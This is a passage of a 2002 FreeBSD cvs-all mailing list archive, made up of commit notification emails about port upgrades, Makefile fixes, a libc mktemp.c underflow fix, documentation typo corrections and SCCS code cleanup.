pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I95Xm71377; Tue, 18 Jun 2002 02:05:33 -0700 (PDT) (envelope-from pat) Message-Id: <200206180905.g5I95Xm71377@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 02:05:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/global Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 02:05:32 PDT Modified files: devel/global Makefile Log: Add USE_PERL5 since port build depend on perl to be present. PR: 39385 Submitted by: maintainer Revision Changes Path 1.9 +1 -0 ports/devel/global/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2: 7:13 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7C6EA37B401; Tue, 18 Jun 2002 02:07:08 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I978371992; Tue, 18 Jun 2002 02:07:08 -0700 (PDT) (envelope-from pat) Message-Id: <200206180907.g5I978371992@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 02:07:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/gpp Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 02:07:06 PDT Modified files: textproc/gpp Makefile Log: PERL -> REINPLACE_CMD PR: 39386 Submitted by: maintainer Revision Changes Path 1.4 +1 -1 ports/textproc/gpp/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2: 8:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A8EE237B404; Tue, 18 Jun 2002 02:08:22 -0700 (PDT) Received: (from pat@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I98MK72180; Tue, 18 Jun 2002 02:08:22 -0700 (PDT) (envelope-from pat) Message-Id: <200206180908.g5I98MK72180@freefall.freebsd.org> From: Patrick Li Date: Tue, 18 Jun 2002 02:08:22 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/sysutils/mktool Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG pat 2002/06/18 02:08:22 PDT Modified files: sysutils/mktool Makefile Log: PERL -> REINPLACE_CMD PR: 39384 Submitted by: maintainer Revision Changes Path 1.2 +2 -1 ports/sysutils/mktool/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:12:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A775837B409; Tue, 18 Jun 2002 02:12:45 -0700 (PDT) Received: (from knu@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9Cjd72941; Tue, 18 Jun 2002 02:12:45 -0700 (PDT) (envelope-from knu) Message-Id: <200206180912.g5I9Cjd72941@freefall.freebsd.org> From: Akinori MUSHA Date: Tue, 18 Jun 2002 02:12:45 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/cvsweb Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG knu 2002/06/18 02:12:45 PDT Modified files: devel/cvsweb Makefile Log: Pass the maintainership over to freebsd-cvsweb@FreeBSD.org. Revision Changes Path 1.66 +1 -1 ports/devel/cvsweb/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:38: 2 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2C39337B40A; Tue, 18 Jun 2002 02:37:59 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9bxU75821; Tue, 18 Jun 2002 02:37:59 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206180937.g5I9bxU75821@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 02:37:58 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/cgicc Makefile distinfo pkg-plist ports/www/cgicc/files patch-ltmain.sh X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 02:37:58 PDT Modified files: www/cgicc Makefile distinfo pkg-plist Removed files: www/cgicc/files patch-ltmain.sh Log: upgrade to 3.2.1 Revision Changes Path 1.5 +2 -2 ports/www/cgicc/Makefile 1.3 +1 -1 ports/www/cgicc/distinfo 1.2 +0 -41 ports/www/cgicc/files/patch-ltmain.sh (dead) 1.4 +10 -8 ports/www/cgicc/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:39:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E1F9C37B40C; Tue, 18 Jun 2002 02:39:39 -0700 (PDT) Received: (from knu@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9ddE76304; Tue, 18 Jun 2002 02:39:39 -0700 (PDT) (envelope-from knu) Message-Id: <200206180939.g5I9ddE76304@freefall.freebsd.org> From: Akinori MUSHA Date: Tue, 18 Jun 2002 02:39:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT access X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG knu 2002/06/18 02:39:39 PDT Modified files: . access Log: I am glad to announce that we finally got a new CVSweb maintainer. Please welcome Ville Skytt,Ad(B (scop), who bravely stepped forward to work on improving FreeBSD CVSweb. Commit bit type: projects/cvsweb Approved by: core Mentored by: knu Revision Changes Path 1.321 +1 -0 CVSROOT/access To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:42:23 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AD13737B401; Tue, 18 Jun 2002 02:42:18 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9gIm76920; Tue, 18 Jun 2002 02:42:18 -0700 (PDT) (envelope-from robert) Message-Id: <200206180942.g5I9gIm76920@freefall.freebsd.org> From: Robert Drehmel Date: Tue, 18 Jun 2002 02:42:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libc/stdio mktemp.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG robert 2002/06/18 02:42:18 PDT Modified files: (Branch: RELENG_4) lib/libc/stdio mktemp.c Log: MFC 1.25: Avoid buffer underflow. Revision Changes Path 1.19.2.2 +2 -2 src/lib/libc/stdio/mktemp.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:43:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9E7EE37B40C; Tue, 18 Jun 2002 02:43:05 -0700 (PDT) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9h5Q77113; Tue, 18 Jun 2002 02:43:05 -0700 (PDT) (envelope-from sheldonh) Message-Id: <200206180943.g5I9h5Q77113@freefall.freebsd.org> From: Sheldon Hearn Date: Tue, 18 Jun 2002 02:43:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/exim Makefile ports/mail/exim/files POST-INSTALL-NOTES POST-INSTALL-NOTES.latest X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sheldonh 2002/06/18 02:43:05 PDT Modified files: mail/exim Makefile mail/exim/files POST-INSTALL-NOTES Removed files: mail/exim/files POST-INSTALL-NOTES.latest Log: Revert rev 1.109 of Makefile. Given the likelihood of future changes in the configuration affecting the base system's MTA, the management of multiple POST-INSTALL-NOTES files could easily become a nightmare. Instead, use a single POST-INSTALL-NOTES file that includes instructions that, at worst, suggest unnecessary but harmless changes. While here, use bullets instead of a numbered list for the notes, so that future deltas are easier to read. Also, mention the 'daily_status_include_submit_mailq' periodic.conf(5) knob, as reported in PR ports/38925. PR: ports/38925 Submitted by: Pat Lashley Revision Changes Path 1.112 +5 -12 ports/mail/exim/Makefile 1.7 +7 -5 ports/mail/exim/files/POST-INSTALL-NOTES 1.2 +0 -37 ports/mail/exim/files/POST-INSTALL-NOTES.latest (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:43:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BB2F737B405; Tue, 18 Jun 2002 02:43:44 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9hi177300; Tue, 18 Jun 2002 02:43:44 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206180943.g5I9hi177300@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 02:43:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/graphics Makefile ports/graphics/libexif-gtk Makefile distinfo pkg-comment pkg-descr pkg-plist ports/graphics/libexif-gtk/files patch-configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 02:43:44 PDT Modified files: graphics Makefile Added files: graphics/libexif-gtk Makefile distinfo pkg-comment pkg-descr pkg-plist graphics/libexif-gtk/files patch-configure Log: add libexif-gtk 0.3.0 GTK+ widgets to display/edit EXIF tags PR: 39117 Submitted by: Ports Fury Revision Changes Path 1.459 +1 -0 ports/graphics/Makefile 1.1 +29 -0 ports/graphics/libexif-gtk/Makefile (new) 1.1 +1 -0 ports/graphics/libexif-gtk/distinfo (new) 1.1 +10 -0 ports/graphics/libexif-gtk/files/patch-configure (new) 1.1 +1 -0 ports/graphics/libexif-gtk/pkg-comment (new) 1.1 +3 -0 ports/graphics/libexif-gtk/pkg-descr (new) 1.1 +19 -0 ports/graphics/libexif-gtk/pkg-plist (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:43:50 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8ACC237B401; Tue, 18 Jun 2002 02:43:47 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9hli77336; Tue, 18 Jun 2002 02:43:47 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206180943.g5I9hli77336@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 02:43:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: CVSROOT modules X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 02:43:47 PDT Modified files: . modules Log: libexif-gtk --> ports/graphics/libexif-gtk Revision Changes Path 1.5379 +1 -0 CVSROOT/modules To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:44:32 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7B6D937B40B; Tue, 18 Jun 2002 02:44:05 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9i5x77446; Tue, 18 Jun 2002 02:44:05 -0700 (PDT) (envelope-from blackend) Message-Id: <200206180944.g5I9i5x77446@freefall.freebsd.org> From: Marc Fonvieille Date: Tue, 18 Jun 2002 02:44:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/articles/ipsec-must article.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/18 02:44:05 PDT Modified files: en_US.ISO8859-1/articles/ipsec-must article.sgml Log: Typo: s/IPSec/IPsec/ PR: docs/38612 Submitted by: Marc Fonvieille Approved by: keramida Revision Changes Path 1.11 +1 -1 doc/en_US.ISO8859-1/articles/ipsec-must/article.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:51:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E48BE37B407; Tue, 18 Jun 2002 02:51:19 -0700 (PDT) Received: (from ijliao@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9pJP78833; Tue, 18 Jun 2002 02:51:19 -0700 (PDT) (envelope-from ijliao) Message-Id: <200206180951.g5I9pJP78833@freefall.freebsd.org> From: Ying-Chieh Liao Date: Tue, 18 Jun 2002 02:51:16 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/print/gimp-print Makefile distinfo pkg-plist ports/print/gimp-print/files patch-configure X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ijliao 2002/06/18 02:51:16 PDT Modified files: print/gimp-print Makefile distinfo pkg-plist Added files: print/gimp-print/files patch-configure Log: upgrade to 4.2.1 PR: 39121 Submitted by: Ports Fury No Response from: maintainer Revision Changes Path 1.2 +44 -5 ports/print/gimp-print/Makefile 1.2 +1 -1 ports/print/gimp-print/distinfo 1.1 +10 -0 ports/print/gimp-print/files/patch-configure (new) 1.2 +1459 -1032 ports/print/gimp-print/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:51:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D259537B410; Tue, 18 Jun 2002 02:51:40 -0700 (PDT) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9pec78898; Tue, 18 Jun 2002 02:51:40 -0700 (PDT) (envelope-from sheldonh) Message-Id: <200206180951.g5I9pec78898@freefall.freebsd.org> From: Sheldon Hearn Date: Tue, 18 Jun 2002 02:51:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/exim-monitor Makefile distinfo ports/mail/exim-monitor/files patch-exim_monitor::em_TextPop.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sheldonh 2002/06/18 02:51:37 PDT Modified files: mail/exim-monitor Makefile distinfo Added files: mail/exim-monitor/files patch-exim_monitor::em_TextPop.c Log: Update to exim-3.36. Oops. This isn't a slave port, and has fallen behind mail/exim! I should make this a slave to avoid repeats of this problem. Submitted by: fenner Revision Changes Path 1.5 +1 -1 ports/mail/exim-monitor/Makefile 1.2 +1 -1 ports/mail/exim-monitor/distinfo 1.1 +14 -0 ports/mail/exim-monitor/files/patch-exim_monitor::em_TextPop.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:53:15 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6D7E037B406; Tue, 18 Jun 2002 02:53:11 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9r8879240; Tue, 18 Jun 2002 02:53:08 -0700 (PDT) (envelope-from robert) Message-Id: <200206180953.g5I9r8879240@freefall.freebsd.org> From: Robert Drehmel Date: Tue, 18 Jun 2002 02:53:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libc/stdio mktemp.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG robert 2002/06/18 02:53:07 PDT Modified files: (Branch: RELENG_4) lib/libc/stdio mktemp.c Log: MFC 1.26,1.27: Cleanup, mostly to conform to style(9). Revision Changes Path 1.19.2.3 +17 -19 src/lib/libc/stdio/mktemp.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:53:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DB63937B407; Tue, 18 Jun 2002 02:53:38 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9rck79351; Tue, 18 Jun 2002 02:53:38 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206180953.g5I9rck79351@freefall.freebsd.org> From: Juli Mallett Date: Tue, 18 Jun 2002 02:53:38 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/cmd admin.c comb.c delta.c get.c prs.c prt.c rmchg.c projects/sccs/sccscmds/com dofile.c projects/sccs/sccscmds/hdr extern.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/18 02:53:38 PDT Modified files: sccs/sccscmds/cmd admin.c comb.c delta.c get.c prs.c prt.c rmchg.c sccs/sccscmds/com dofile.c sccs/sccscmds/hdr extern.h Log: * Sort prototypes. * do_file's function argument needs return no value. * Chase the change to do_file with all prototyped subroutines that are handed to do_file. Revision Changes Path 1.20 +3 -4 projects/sccs/sccscmds/cmd/admin.c 1.13 +2 -3 projects/sccs/sccscmds/cmd/comb.c 1.16 +2 -4 projects/sccs/sccscmds/cmd/delta.c 1.24 +3 -5 projects/sccs/sccscmds/cmd/get.c 1.25 +1 -1 projects/sccs/sccscmds/cmd/prs.c 1.13 +2 -4 projects/sccs/sccscmds/cmd/prt.c 1.18 +2 -3 projects/sccs/sccscmds/cmd/rmchg.c 1.10 +1 -1 projects/sccs/sccscmds/com/dofile.c 1.26 +9 -10 projects/sccs/sccscmds/hdr/extern.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:58:53 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0572E37B406; Tue, 18 Jun 2002 02:58:51 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9woP80731; Tue, 18 Jun 2002 02:58:50 -0700 (PDT) (envelope-from blackend) Message-Id: <200206180958.g5I9woP80731@freefall.freebsd.org> From: Marc Fonvieille Date: Tue, 18 Jun 2002 02:58:50 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/en_US.ISO8859-1/books/handbook/preface preface.sgml doc/en_US.ISO8859-1/books/handbook/security chapter.sgml X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/18 02:58:50 PDT Modified files: en_US.ISO8859-1/books/handbook/preface preface.sgml en_US.ISO8859-1/books/handbook/security chapter.sgml Log: Typo: s/IPSec/IPsec/ PR: docs/38615 Submitted by: Marc Fonvieille Approved by: keramida Revision Changes Path 1.9 +1 -1 doc/en_US.ISO8859-1/books/handbook/preface/preface.sgml 1.111 +2 -2 doc/en_US.ISO8859-1/books/handbook/security/chapter.sgml To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 2:59:22 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E026137B410; Tue, 18 Jun 2002 02:59:15 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5I9xF780841; Tue, 18 Jun 2002 02:59:15 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206180959.g5I9xF780841@freefall.freebsd.org> From: Juli Mallett Date: Tue, 18 Jun 2002 02:59:15 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/cmd admin.c bdiff.c cmt.c comb.c delta.c get.c prs.c rmchg.c snull.c val.c projects/sccs/sccscmds/com date_ab.c dodelt.c dofile.c dohist.c dolist.c permiss.c putline.c rdmod.c setup.c ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/18 02:59:15 PDT Modified files: sccs/sccscmds/cmd admin.c bdiff.c cmt.c comb.c delta.c get.c prs.c rmchg.c snull.c val.c sccs/sccscmds/com date_ab.c dodelt.c dofile.c dohist.c dolist.c permiss.c putline.c rdmod.c setup.c sccs/sccscmds/hdr defines.h sccs/sccscmds/util fatal.c lockit.c setsig.c xlink.c xmsg.c xopen.c Log: Swallow (sometimes many) spurious repeating blank lines. Revision Changes Path 1.21 +0 -6 projects/sccs/sccscmds/cmd/admin.c 1.13 +0 -6 projects/sccs/sccscmds/cmd/bdiff.c 1.17 +0 -6 projects/sccs/sccscmds/cmd/cmt.c 1.14 +0 -6 projects/sccs/sccscmds/cmd/comb.c 1.17 +0 -16 projects/sccs/sccscmds/cmd/delta.c 1.25 +0 -8 projects/sccs/sccscmds/cmd/get.c 1.26 +0 -12 projects/sccs/sccscmds/cmd/prs.c 1.19 +0 -5 projects/sccs/sccscmds/cmd/rmchg.c 1.14 +0 -10 projects/sccs/sccscmds/cmd/snull.c 1.17 +0 -10 projects/sccs/sccscmds/cmd/val.c 1.18 +0 -3 projects/sccs/sccscmds/com/date_ab.c 1.17 +0 -2 projects/sccs/sccscmds/com/dodelt.c 1.11 +0 -1 projects/sccs/sccscmds/com/dofile.c 1.13 +0 -4 projects/sccs/sccscmds/com/dohist.c 1.10 +0 -1 projects/sccs/sccscmds/com/dolist.c 1.15 +0 -2 projects/sccs/sccscmds/com/permiss.c 1.12 +0 -3 projects/sccs/sccscmds/com/putline.c 1.13 +0 -4 projects/sccs/sccscmds/com/rdmod.c 1.14 +0 -2 projects/sccs/sccscmds/com/setup.c 1.17 +0 -7 projects/sccs/sccscmds/hdr/defines.h 1.7 +0 -1 projects/sccs/sccscmds/util/fatal.c 1.11 +0 -1 projects/sccs/sccscmds/util/lockit.c 1.9 +0 -3 projects/sccs/sccscmds/util/setsig.c 1.9 +0 -1 projects/sccs/sccscmds/util/xlink.c 1.12 +0 -1 projects/sccs/sccscmds/util/xmsg.c 1.9 +0 -1 projects/sccs/sccscmds/util/xopen.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 3:22:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C20BF37B408; Tue, 18 Jun 2002 03:22:40 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IAMe488297; Tue, 18 Jun 2002 03:22:40 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206181022.g5IAMe488297@freefall.freebsd.org> From: Juli Mallett Date: Tue, 18 Jun 2002 03:22:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/cmd prs.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/18 03:22:40 PDT Modified files: sccs/sccscmds/cmd prs.c Log: * Read and treat single line comments ala g lines, etc. * Print comments. * Colons not being used for a format must be escaped to prevent breaking of of the scanspec() codepath early. This may or may not violate standards. Revision Changes Path 1.27 +8 -5 projects/sccs/sccscmds/cmd/prs.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 3:23:36 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EAA4237B408; Tue, 18 Jun 2002 03:23:33 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IANXH88381; Tue, 18 Jun 2002 03:23:33 -0700 (PDT) (envelope-from tjr) Message-Id: <200206181023.g5IANXH88381@freefall.freebsd.org> From: "Tim J. Robbins" Date: Tue, 18 Jun 2002 03:23:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/time time.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/18 03:23:33 PDT Modified files: (Branch: RELENG_4) usr.bin/time time.c Log: MFC: Don't let warn() clobber errno, WARNS and style changes (1.19-1.21) Revision Changes Path 1.14.2.4 +5 -10 src/usr.bin/time/time.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Tue Jun 18 3:34:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4FF0937B410; Tue, 18 Jun 2002 03:34:01 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5IAY1589234; Tue, 18 Jun 2002 03:34:01 -0700 (PDT) (envelope-from jmallett) 